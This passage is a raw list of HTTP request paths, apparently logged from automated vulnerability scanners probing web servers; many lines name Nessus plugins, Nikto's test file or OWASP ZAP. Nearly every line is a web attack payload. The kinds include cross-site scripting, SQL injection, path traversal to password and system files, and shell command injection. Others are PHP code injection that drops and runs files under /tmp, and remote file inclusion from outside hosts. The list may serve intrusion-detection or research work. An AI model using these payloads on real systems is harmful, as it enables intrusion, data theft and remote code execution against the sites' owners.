'1','2','pixelpost_category_sql_injection.nasl','1331909407','5'--\n/um7xpn15.asp?<script>document.cookie=\"testotoy=6142;\"</script>\n/msadc/..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/examples/jsp/sessions/top.php?header=../../../../../../../../etc/passwd\n/subscriptions.rhtml\n/examples/jsp/num/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/bn857frh.html?<script>cross_site_scripting.nasl</script>\n/javascript/click.exe\n/index.php?src=1&_common=1&time=1331909415&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/main.php?stuff=';rm\\x09q19963916\\x09#\n/cacti/viewcvs.cgi/?cvsroot=<script>foo</script>\n/examples/jsp/num/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/examples/servlets/servlet/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/examples/servlets/servlet/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/examples/servlets/servlet/search.jsp?q=%\"<script>alert(1331904374)</script>\n/hrttz9fj.cfm?<script>document.cookie=\"testtbjy=7334;\"</script>\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/bin/echo+-en+\"\\0174\\0044\\0000\\0377\\0347\"+>>+/tmp/symxvqrirx0;').\"]=1\n/q703m78q.kspx?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/zoomstats/libs/dbmax/mysql.php?globals['lib']['db']['path']=http://cirt.net/rfiinc.txt??\n/fcgi-bin/sawmill?rfcf+\"sawmillinfo/sawmillpassword\"+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3\n/examples/servlets/servlet/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/examples/jsp/jsp2/el/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/en-us/w4996nr0.do?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/5qnlm5z2.html?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/scripts/support/fckeditor/editor/filemanager/upload/asp/upload.asp\n/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/cgi-bin/gw5/gwweb.exe\n/main.php?logout=\"&rm\\x09q84263823\\x09#\n/javascript/fn.exe\n/examples/jsp/jsp2/jspx/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/cacti/showcat.php?cat=1'\n/9ko6m4c8.aspx?<script>document.cookie=\"testylik=3403;\"</script>\n/0z575z74.dll?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/rv98iwjp.pl?<script>cross_site_scripting.nasl</script>\n/launch.asp?nfuse_application=>alert(document.cookie);</script>\n/htsrv/login.php?redirect_to=\"onmouseover=\"alert(411265570903)\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=@rfiurl?pth['file']['config']=@rfiurl?\n/cgi-bin/betsie/parserl.pl/<script>alert('vulnerable')</script>;\n/d7ktpmcq.cfm?<script>cross_site_scripting.nasl</script>\n/en-us/account/htmlscript?../../../../../../../../../etc/passwd\n/examples/jsp/checkbox/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/en-us/account/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/recordings/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/scripts/windmail\n/supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('vulnerable')</script>&lt;/script&gt;\n/ngr2000subscrdescription_2/\n/en-us/account/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/<script>document.cookie=\"testcrcv=6167;\"</script>\n/jujgxwav.x?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/reboot.exe/\n/servlet/org.apache.catalina.context/<script>alert('vulnerable')</script>\n/main.php?stuff='&rm\\x09q28979577\\x09#\n/9ko6m4c8.htm?<script>document.cookie=\"testylik=3403;\"</script>\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/ypsyckgibz0+>+/dev/null+&'); function v\n/main.php?logout=\"\\x0ddel q69325217 #\n/i7prbs22.htm?<script>document.cookie=\"testjnre=7328;\"</script>\n/main.php?stuff=\"|ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/examples/jsp/checkbox/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/phpmyadmin//..\\..\\..\\..\\..\\..\\..\\..\\windows/win.ini\n/script/init/createallimagecache.php?path_to_code=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/help.php?q=\"ping\\x09-w\\x097000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/606wkcop.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/e9rx3ya4.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/examples/jsp/sessions/phptonuke.php?filnavn=/etc/passwd\n/h21y8w52.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/store.php?crn=42'&action=show&show_products_mode=cat_click\n/member/usercp_menu.php?script_folder=http://192.168.202.96:8080/4dckqcc0acprbz?\n/top.php?stuff=\"ver\\xa0>q56682636&rem\\xa0\n/javascript/notification.exe\n/help.php?q=\"&ver\\x0b>q72412482&rem\\x0b\n/hacker's delight/\n/examples/jsp/checkbox/config.php?path[docroot]=/etc/passwd\\x00\n/cacti/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/p043snfr.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/j4rdyhw8.cfc?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/main.php?stuff=\"ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/nt-scripture/\n/xsqln7eb.cgi?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/zmvq66jy.mscgi?<script>cross_site_scripting.nasl</script>\n/add_url.htm?node=<script>alert('xss')</script>\n/javascript/ear.exe\n/examples/jsp/jsp2/jspx/index.php?search=<script>foo</script>\n/cacti/port.php?proto=tcp'\n/en-us/ddoworrl.php3?<script>document.cookie=\"testvlau=8517;\"</script>\n/en-us/account/webdist.cgi?distloc=;id\n/examples/jsp/error/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/df5console.exe/\n/examples/servlets/servlet/index.php?templates_dir=/etc/passwd\\x00\n/examples/jsp/colors/file.php?path=/etc/passwd\\x00\n/i2n4v4rl.html?<script>cross_site_scripting.nasl</script>\n/cgi-bin/index.php?setlang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd\n/um7xpn15.x?<script>document.cookie=\"testotoy=6142;\"</script>\n/examples/jsp/colors/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/fpnpp5zg.cfc?<script>document.cookie=\"testyias=101;\"</script>\n/javascript/2004.exe\n/b4vng02k.php?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/um7xpn15.cfc?<script>document.cookie=\"testotoy=6142;\"</script>\n/scripts/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/examples/jsp/checkbox/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/3m5knyc4.php3?<script>document.cookie=\"testbgqj=6434;\"</script>\n../../../flags/iwvsggrh.txt\n/~/<script>alert('vulnerable')</script>.asp\n/open.php?err=<script>alert(412195577685)</script>\n/subscriptions.txt\n/main.php?stuff=\"&ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/en-us/account/notify?from=nessus\"|id\"\n/en-us/account/tombstone.cfm?profileid=<script>foo</script>\n/examples/jsp/colors/index.php?cid='\n/ydexw8by.cfm?<script>document.cookie=\"testulex=4996;\"</script>\n/main.php?stuff=';del\\x09q44154782\\x09#\n/prescription-expiration/\n/main.php?stuff=\"&ping\\x09-w\\x0911000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/phpmyadmin/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/bzuf9ozq.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jnv890lt.dll?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/txenjrxf3?\n//</p><body><script/src=\"http://www.example.com/test?rnd=q48672348\"></script><p>\n/ddoworrl.php?<script>document.cookie=\"testvlau=8517;\"</script>\n/q703m78q.dll?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/help.php?q=\\x0auname >q71142976 #\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331919223,4,5\n/oie504mr.php3?<script>document.cookie=\"testtpby=7052;\"</script>\n/manager/javascript.php?abs_path=/etc/passwd\\x00\n//q47719336&q1431\"q1431<q1431>q47719336\n/examples/jsp/num/index.php?configfile=../../../../../../../../../etc/passwd\n/main.php?stuff=\"\\x0ddel q98657175 #\n/oscommerce-xss/\n/pythonscriptforparsingsettings/\n/d7ktpmcq.pl?<script>cross_site_scripting.nasl</script>\n/dslpwt15.nsf?<script>document.cookie=\"testtkio=5454;\"</script>\n/help.php?q=\"\\x0drm\\x09q99489698\\x09#\n/examples/jsp/checkbox/help.php?section='qualiteam_xcart_sql_xss.nasl\n/help.php?q=\"\\x0duname\\x09>q14674684\\x09#\n/cacti/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/9kr0ih0v.jspa?<script>document.cookie=\"testzgnm=1183;\"</script>\n/examples/servlets/servlet/phpnews/sendtofriend.php?mid='1'\n<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/main.php?stuff=;uname\\x09#\n/odzk29aa.exe?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/cgi/fileseek.cgi?foot=;cat /etc/passwd&head=\n/3m5knyc4.dll?<script>document.cookie=\"testbgqj=6434;\"</script>\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=odglgrw3g6v6s149n\n/en-us/s7qus4g3.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/de3v2dd9.kspx?<script>cross_site_scripting.nasl</script>\n/cacti/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/rv98iwjp.cfc?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"&del q52615858&rem \n/cgi-win/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/en-us/account/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/top.php?stuff=\";rm\\x09q35965763\\x09#\n/javascript/access_log.exe\n/top.php?stuff=ping;-w;11000;-n;1;4.3.2.1&rem;\n/de3v2dd9.fts?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,418619243,434476407,1,1,1,1,1--&blogid=1\n/examples/jsp/cal/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/<$httpwebroot$>groups/\n/?<script>document.cookie=\"testrhbc=8184;\"</script>\n/help.php?q=\\x0duname\\x09>q91242654\\x09#\n/cgi-sys/sensepost.exe?/c+dir\n/subscription_cs/\n/lmw4r201.php?<script>document.cookie=\"testwews=8477;\"</script>\n/examples/servlets/servlet/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/scripts/zq9frlz6fcfp.asp\n/scgi-bin/r.cgi?file=../../../../../../../../../../etc/passwd\n/top.php?stuff=\";sleep 7 #\n/main.php?stuff='rm\\x09q85612241\\x09#\n/169okeyj.kspx?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/interface/login/login_frame.php?site=<script>alert(owasp zap);</script> or 1=1\n/ows-bin/ion-p.exe?page=c:\\winnt\\repair\\sam\n/phpmyadmin/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\nfaq.php?skin=../../admin/manager&tplpath=admin\n/main.php?logout=\"&ver\\xa0>q66468753&rem\\xa0\n/main.php?stuff='sleep\\x0911\\x09#\n/apavxugx.exe?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/vac1l5vm.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/gz.exe\n/bmeun223.dll?<script>document.cookie=\"testhhwu=7044;\"</script>\n/help.php?q='\\x0adel\\x09q12762848\\x09#\n/examples/jsp/cal/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/examples/jsp/colors/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/scripts/w04ukbv54ixz.shtml\n/db.php?q='&t='\n/top.php?stuff=\";uname >q35934398 #\n/javascript/.passwd.err\n/lsoix5h3.html?<script>cross_site_scripting.nasl</script>\n/javascript/dir.exe\n/examples/jsp/sessions/view_user.php?list=1&letter=&sort_by='select\n/help.php?q=ver >q75293435&rem \n/en-us/account/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/examples/jsp/colorssearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/cgi-home/ppdscgi.exe\n/main.php?logout=';uname\\x09#\n/7dbjwpw6.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/examples/jsp/sessions/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/recordings/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919008,1645922045 -- \n/main.php?logout=\"\\x0duname\\x09>q32424996\\x09#\n/javascript/xslt.exe\n/examples/jsp/num/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919008,1645922045 -- \n/examples/jsp/cal/pfdispaly?../../../../../../etc/passwd\n/scripts/zdbyw3dn3gh2.asp\n/b1q8bywu.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/odzk29aa.do?<script>document.cookie=\"testtfvh=2141;\"</script>\n/subscriptions.7z\n/yef5f3d5.htm?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 1089880881--\n/<script>document.cookie=\"testulex=4996;\"</script>\n/webcgi/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/manager/search.php?searchstring=<script>foo</script>\n/mod.php?mod=orders&mode=view&sb=1&so=a&fb=&fs=\"><script>alert(\"411676083443\");</script><\"3\n/cacti/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/examples/jsp/colors/profil.php?id=1 <script>foo</script>\n/main.php?logout=\"del\\x09q86373985&rem\\x09\n/main.php?stuff=\"del\\x0cq95513284&rem\\x0c\n/main.php?logout=\"&ver\\x0c>q71167917&rem\\x0c\n/zqqemp6j.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/msmmask.exe?mask=/nessus916931341.asp\n/nmw0do67.fts?<script>cross_site_scripting.nasl</script>\n/bemarket/postscript/postscript.php?p_mode=http://192.168.202.118:8080/iroy1gvqrrqu?\n/javascript/program.exe\n/en-us/ddoworrl.fts?<script>document.cookie=\"testvlau=8517;\"</script>\n/scripts/xuicksry9grj.inc\n/edzaia0i.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/s7qus4g3.html?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/add_url.htm?node=<script>alert('xss')</script>\n/scripts/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/forum-ra_professionnel.asp?n=/../../../../../../etc/passwd\n/cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\\x00\n/msmmask.exe?mask=/nessus1519874766.asp\n/pyconpostmortemirctranscript/\n/link-descriptions/\n/top.php?stuff=rm;q99348313&rem;\n/main.php?logout='\\x0drm q29695698 #\n/javascript/cms.exe\n/examples/jsp/jsp2/el/search.php?submit=true&search=');\n/ju0u7kfo.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1\n/scriptblocks/\n/t578vqea.idc?<script>document.cookie=\"testsory=7676;\"</script>\n/scripts/starnet/addons/slideshow_full.php?album_name='679916042\n/cacti/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/cgi-914/sensepost.exe?/c+dir\n/psynch/nph-psf.exe?css=http://cirt.net/rfiinc.txt?\n/main.php?stuff=&ver\\x09>q94533635&rem\\x09\n/jnv890lt.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/gepi/gestion/savebackup.php?filenikto=http://cirt.net/rfiinc.txt?&cmd=cat/etc/passwd\n/lsoix5h3.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/bullet.exe\n/scripts/zq9frlz6fcfp.cgi\n/scripts/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/main.php?logout=\";del q17425978 #\n/top.php?stuff=\"&del,q25287739&rem,\n/examples/jsp/colors/shoutbox.php?conf=../../../../../../../../etc/passwd\n/examples/jsp/jsp2/jspx/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/examples/jsp/error/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/include/scripts/send_email_cache.php?dir=http://192.168.202.118:8080/zz5thkvtmlgl?\n/ny1b3qq4.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/&frm_user=&scr_height=q12518163&scr_width=\n/javascript/crontab.exe\n/administrator/popups/sectionswindow.php?type=web&link=\\\"<script>alert(document.cookie)</script>\n/help.php?q=;del\\x09q36511176\\x09#\n/bzuf9ozq.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"|ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/r3le3om5.cfc?<script>cross_site_scripting.nasl</script>\n/pcadmin/login.asp?idadmin='' or 1=1--\n/script/common.inc.php?path_inc=http://192.168.202.118:8080/ghl9il?\n/examples/jsp/checkbox/cal_week.php?op=week&catview=999'\n/en-us/fo564rei.aspx?<script>cross_site_scripting.nasl</script>\n/saml.exe\n/help.php?q=\"&ping,-w,7000,-n,1,1.2.3.4&rem,\n/ultram_prescription/\n/examples/jsp/error/way-board/way-board.cgi?db=/etc/passwd\\x00\n/archive.php?scriptpath=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/scripts/www/delivery/ac.php?bannerid=-1331919146+or+1=1+--+';passthru(base64_decode($_server[http_nessus_tuezckvg]));die;/*\n/scripts/w04ukbv54ixz.html\n/scripts/admin/\n/g3w7y7u5.x?<script>document.cookie=\"testbfpq=3326;\"</script>\n/main.php?logout=\"del,q59646442&rem,\n/main.php?stuff='&rm\\x09q13569746\\x09#\n/ewc3rz1l.jspa?<script>document.cookie=\"testkgqo=204;\"</script>\n/help.php?q=';rm\\x09q69988199\\x09#\n/main.php?stuff=\"&del q52846748 #\n/main.php?logout='\\x0drm q95689814 #\n/javascript/.passwd.inc\n/9ko6m4c8.php?<script>document.cookie=\"testylik=3403;\"</script>\n/main.php?stuff=\";sleep\\x097\\x09#\n/javascript/thread.exe\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 1313328975--\n/cgi-bin/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/help.php?q=\"&rm\\x09q66498964&rem\\x09\n/phpmyadmin/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/javascript/projects.exe\n/nuh3zirz.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"ping;-w;9000;-n;1;4.3.2.1|rem;\n/javascript/document.doc\n/examples/jsp/cal/showproduct.php?product=1'\n/main.php?logout='\\x0ddel q42494852 #\n/javascript/you.exe\n/javascript/features.exe\n/scripts/search.jsp?q=%\"<script>alert(1331918979)</script>\n/examples/jsp/colors/cvslog.cgi?file=<script>window.alert</script>\n/hamtaro's_theory/\n/examples/jsp/jsp2/el/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/top.php?stuff='|sleep\\x099\\x09#\n/7uz3ok60.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/faq.php?action=&type=view&s=&id=-1' union select 0,230233793,0,0,0,0,0--\n/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosconfig_absolute_path=http://192.168.202.118:8080/zz5thkvtmlgl?\n/g3w7y7u5.do?<script>document.cookie=\"testbfpq=3326;\"</script>\n/examples/jsp/checkbox/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/javascript/jobs.exe\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/augpuxhmyg.sh+>+/dev/null+&'); function v\n/manager/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/path_script/createurl.php?formurl=http://192.168.202.96:8080/txenjrxf3?\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/jnv890lt.exe?<script>cross_site_scripting.nasl</script>\n/prescriptionxanax/\n/x2gyorli.php?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/help.php?q=ver,>q82799612&rem,\n/main.php?logout=&ping;-w;9000;-n;1;4.3.2.1&rem;\n/examples/jsp/num/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908834',null,null,null,null --\n/6n7aacgg.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"&rm\\x09q79499365\\x09#\n/scripts/udblphlq4nln.cfm\n/....\\....\\....\\....\\....\\....\\....\\....\\....\\winnt\\win.ini\n/j734qobz.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://cirt.net/rfiinc.txt?\n/scripts/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/script/ident/ident.inc.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?\n/tukodz3j.aspx?<script>cross_site_scripting.nasl</script>\n/b1q8bywu.pl?<script>cross_site_scripting.nasl</script>\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+555+/tmp/bxtfwlgmsj0;').\"]=1\n/pxagj7n7.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/?<script>document.cookie=\"testvqcy=252;\"</script>\n/0u75ldxq.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=rm;q42465427&rem;\n/manager/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--\n/5qnlm5z2.jsp?<script>document.cookie=\"testsixi=8451;\"</script>\n/zroo33l4.php?<script>document.cookie=\"testiklc=904;\"</script>\n/scriptlogic 6/\n/examples/jsp/jsp2/el/index.php?search=<script>foo</script>\n/examples/jsp/checkbox/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/tod maffin's directory of public radio podcasts/\n/webplus?script=/../../../../etc/passwd\n/scripts/kfzqb5x87lvq.shtml\n/l'empire/\n/cgi-exe/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+68+65+74+00+00+68+73+6f+63+6b+68+65+63+74+00+68+63+6f+6e+6e+8b+dc+53+51+83++>>esbq\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;/tmp/pcousamoyu;\"\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/bin/echo+-en+\"\\0174\\0044\\0000\\0377\\0347\"+>>+/tmp/xvvpghsokp0;').\"]=1\n/3m5knyc4.cgi?<script>document.cookie=\"testbgqj=6434;\"</script>\n/top.php?stuff=;sleep 9 #\n/en-us/fo564rei.cfm?<script>cross_site_scripting.nasl</script>\n/scripts/tomcat_proxy_directory_traversal.nasl1331908738\n/javascript/document.xslt\n/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331908738','5'--\n/javascript/tel.exe\n/main.php?stuff=\"ping;-w;11000;-n;1;4.3.2.1|rem;\n/phpmyadmin/home/search.asp?nchannel='1\n/5o9zq43e.php3?<script>cross_site_scripting.nasl</script>\n/cacti/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/cgi-home/query?mss=../config\n/g8nu2yy7.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/a0imiuf1.kspx?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/3m5knyc4.nsf?<script>document.cookie=\"testbgqj=6434;\"</script>\n/examples/jsp/sessions/index.php?id='union/**/select/**/0,0,1705245003,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/welwcbtdbf0+>+/dev/null+&').\"]=1\n/i don't feel like dancing/\n/subscriptions.pdf\n/main.php?logout=|ping;-w;7000;-n;1;4.3.2.1|rem;\n/cgi-bin/index.php?search=<script>foo</script>\n/yef5f3d5.php3?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--\n/top.php?stuff=\";rm q25742723 #\n/main.php?stuff=\";del\\x09q18442351\\x09#\n/examples/jsp/colors/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/en-us/dda2qr7j.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/n9xlumt5.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/view_user.php?list=1&letter=&sort_by='select\n/top.php?stuff=\"\\x0auname\\x09#\n/interface/login/login_frame.php?site=<script>alert(owasp zap);</script>');waitfor delay '0:0:15';--\n/en-us/account/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/path_script/createurl.php?formurl=http://192.168.202.96:8080/4dckqcc0acprbz?\n/examples/jsp/jsp2/el/lang/index.php?file=/etc/passwd\n/en-us/s7qus4g3.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010395',null,null,null,null --\n/7uz3ok60.x?<script>cross_site_scripting.nasl</script>\n/x7pclv4s.idc?<script>document.cookie=\"testiulz=3709;\"</script>\n/top.php?stuff=\"ping,-w,11000,-n,1,4.3.2.1|rem,\n/en-us/account/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/msadc/..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/xlj7h65o.aspx?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/manager/styles.php?toroot=/etc/passwd\\x00\n/msadm/user/login.php3?account_name=\\\"><script>alert('vulnerable')</script>\n/forum.asp?n=../../boot.ini|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/examples/jsp/sessions/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/help.php?q=\"del;q71157849&rem;\n/script/fckeditor/fckconfig.js\n/examples/servlets/servlet/index.php?id='union/**/select/**/0,0,1680418306,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/zln2hm2z.asp?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/examples/jsp/cal/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/scripts/?user=jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--&file=index&pass=\n/examples/jsp/checkbox/cart32.exe\n/g3w7y7u5.php?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/qb2xy9aw.cgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/scriptpath/index.php?page=http://192.168.202.96:8080/no4ghqiguzhst?\n/cgi-bin/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/top.php?stuff=\"|ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/scriptrap/\n/javascript/old.exe\n/qczkquis.cfm?<meta http-equiv=set-cookie 